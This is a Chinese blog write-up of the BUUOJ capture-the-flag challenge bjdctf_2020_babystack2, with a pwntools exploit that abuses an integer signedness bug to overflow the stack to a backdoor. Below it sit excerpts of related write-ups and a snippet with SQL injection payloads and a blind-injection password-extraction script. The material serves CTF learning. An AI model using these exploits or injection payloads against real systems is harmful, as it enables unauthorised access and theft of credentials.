[BUUOJ]bjdctf_2020_babystack2

最新推荐文章于 2025-02-18 22:56:03 发布
原创 最新推荐文章于 2025-02-18 22:56:03 发布 · 259 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#系统安全 #Pwn #CTF

博客围绕bjdctf_2020_babystack2展开,该程序为64位小端序。IDA分析未发现明显输入溢出逻辑,但找到后门函数。经观察,数值存在从int到unsigned int的强制转换,判定为整型溢出。输入-1可突破长度限制,借此修改返回地址以getshell。

bjdctf_2020_babystack2

checksec是64位小端序,IDA分析看没找到明显的输入溢出逻辑,但是找到了后门函数,再仔细观察发现数值里面有强制转换,有一部分从int转到了unsigned int,因此可以初步判定为整型溢出,如果我输入-1即可突破长度为10的限制,所以以此下手即可成功修改返回地址,getshell

from pwn import *
from LibcSearcher import *

#context.log_level="debug"

context(os='linux',arch='i386', log_level = 'debug')

#p=process('./bjdctf_2020_babystack2')
elf=ELF('./bjdctf_2020_babystack2')
p=remote('node4.buuoj.cn', 29027)

p.recvuntil('name:\n')
p.sendline('-1')

payload = b'a'*(0x10 + 8) + p64(0x400726)
p.sendline(payload)
p.interactive()
BUUCTF bjdctf_2020_babystack2
2401_88087539的博客
01-30 300
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
[BUUCTF]PWN——bjdctf_2020_babystack2
BangSen1的博客
04-06 1305
bjdctf_2020_babystack2 64位,开启NX保护。 运行一下。 用IDA打开。找到了后门函数。backdoor=0x400726 查看main函数 读入数据的大小由我们输入的参数nbytes控制 nbytes参数的类型 是 size_t,它是一个无符号整型。 但是第7行又将它转换成了有符号的整型,存在整数溢出漏洞(即无符号的数转换成有符号的整型后超过了有符号的整型能表示的范围,从而造成溢出,常用-1来造成溢出) from pwn import * r=remote('nod
CTFbjdctf_2020_babystack2
凉水的博客
06-30 759
bjdctf_2020_babystack2
【BUUCTFbjdctf_2020_babystack2
m0_51251108的博客
12-30 394
【BUUCTFbjdctf_2020_babystack2 64位,无canary 有后门函数 这题思路就是用无符号和有符号整型来绕过10的比较 比如:送入一个-1,无符号类型会把它看成一个很大的正整数,是,而有符号则认为是-1 这题size_t是一种无符号整型,下面被强转成有符号,最后又强转成无符号 所以可以绕过 exp: from pwn import* r=remote('node3.buuoj.cn',29907) context.log_level = 'debug' backdoor=0
[BUUCTF-pwn]——bjdctf_2020_babystack2
Y_peak的博客
02-22 285
[BUUCTF-pwn]——bjdctf_2020_babystack2 题目地址: https://buuoj.cn/challenges#bjdctf_2020_babystack2 先checksec一下 在IDA中查看一下,注意想要栈溢出,首先需要nbytes足够大。size_t类型在标准C语言库中,是unsigned int类型, 64位 long unsigned int。 而%d 是按照int类型读取的,我们读入-1。其实就相当于一个很大的数字,但是可以绕过检查。具体可以了解下整型溢出
buuctf-bjdctf_2020_babystackpwn
2301_81574836的博客
02-18 979
buuctf-bjdctf_2020_babystackpwn)题解
BUUCTF pwn——bjdctf_2020_babystack
CNS-Enterprise BCC-1701-J
03-31 435
BUUCTF 做题练习
bjdctf_2020_babystack【BUUCTF
qq_41696518的博客
08-26 1126
bjdctf_2020_babystack
CTF buuoj pwn-----第10题: bjdctf_2020_babystack
热门推荐
bing_Max的博客
09-28 2万+
思路 本体有后门函数, 最简单的是直接调用. 这里想用一下system函数,一开始忘了是32位的,写了个payload_1 = b’a’*(0x10+8) + p64(system_addr)+p64(1)+p64(binsh_addr) 显然不成功 后来反映过来, 写了payload_1 = b’a’*(0x10+8) + p64(pop_rdi_addr)+p64(binsh_addr)+p64(system_addr),成功获取flag 编写exp from pwn import * con
bjdctf_2020_babystack
zip471642048的博客
06-22 890
checksec 一下 64位程序 没开啥东西 ,ida看一下程序 咋一看read函数读入0个字符串,读了个寂寞,scanf也不能溢出,好像没有问题 但是scanf会读入一个用户输入的数赋值给nbytes ,然后read会读取nbytes大小的字符,也就是说我们可以任意溢出长度 运行这个函数直接拿到shell exp ret 是为了平衡栈 其实往backdoor函数后递+1也行...
bjdctf_2020_babystack2
m0sway的博客
04-04 498
bjdctf_2020_babystack2 WriteUp BUU_PWN
bjdctf_2020_babystack2【BUUCTF
qq_41696518的博客
08-31 923
bjdctf_2020_babystack2【BUUCTF
bjdctf 2020 babystack2
pondzhang的专栏
05-19 301
from pwn import * p = process('./bjdctf_2020_babystack2') p.sendlineafter("length of your name:\n","-1") payload = 24*'a'+ p64(0x0000000000400893) + p64(0) + p64(0x0000000000400726) p.sendlineafter("name?\n",payload) p.interactive()
BUU刷题-Pwn-bjdctf_2020_babystack2
一个啥也不会的小菜鸡!
06-21 317
因此可以输入0x80000001=>2147483649,signed int类型被当做负数小于10,read函数中unsigned int类型被当成正整数2147483649。比较nbytes和10的大小,可以利用无符号整数溢出漏洞,输入一个负数,进而输入name的时候可以实现栈溢出跳转到后门函数getshell。nbytes是signed int类型,4字节,但后面read函数输入name时却是unsigned int类型。
BUUCTFbjdctf_2020_babystack2(write up)
qq_44768749的博客
08-24 1747
BUUCTFbjdctf_2020_babystack20x01文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01文件分析 64位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 先输入name的长度,再输入name 0x03 IDA 输入nbytes的长度要小于10 同时给出了后面函数直接getshell 0x04 思路 比较nbytes和10的大小,可以利用符号溢出漏洞,输入一个负数,进而输入name的时候可以实现栈溢出跳转到后门函数ge
buuoj ez_sql
最新发布
03-22
### 关于BUUOJ平台上的 `ez_sql` 题目解析 在BUUOJ平台上,`ez_sql` 是一道经典的SQL注入练习题。这类题目通常旨在测试参赛者对于SQL语句构造的理解以及如何利用输入验证漏洞来获取数据库中的敏感数据。 #### SQL注入基础原理 SQL注入是一种常见的安全漏洞,攻击者通过向应用程序提交恶意的SQL代码片段,从而改变原本预期执行的查询逻辑[^1]。这种技术可以用来绕过身份认证、读取敏感数据或者破坏数据库结构。 针对 `ez_sql` 这类挑战的具体解决方法如下: #### 利用布尔盲注提取信息 如果目标应用返回的结果页面会因为不同的条件而有所变化,则可以通过发送一系列精心设计的请求逐步推断出隐藏的信息。例如,在登录界面尝试使用 `' OR '1'='1 --` 的方式强制让WHERE子句恒成立以实现未授权访问[^2]。 #### 时间延迟法探测字符 当无法直接观察到反馈差异时,可采用基于时间的盲注技巧。这涉及到构建能使服务器响应变慢(取决于特定条件下触发sleep函数)的payloads, 如 `IF(SUBSTRING(@@version,1,1)=5,SLEEP(5),0)` 来判断MySQL版本号的第一个数字是否为5[^3]。 以下是Python脚本的一个简单例子用于自动化上述过程的一部分: ```python import requests from string import digits, ascii_lowercase url = "http://example.com/login" charset = digits + ascii_lowercase result = '' for i in range(1, 21): found_char = False for char in charset: payload = f"' AND (SELECT SUBSTR(password,{i},1) FROM users WHERE id=1)='{char}'-- " data = {'username': payload, 'password':'random'} response = requests.post(url, data=data) if "Welcome" in response.text: result += char print(f"[+] Found character {char} at position {i}") found_char = True break if not found_char: break print("[*] Final password:", result) ``` 此代码仅作为学习用途展示可能的技术手段,请勿非法入侵任何系统!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值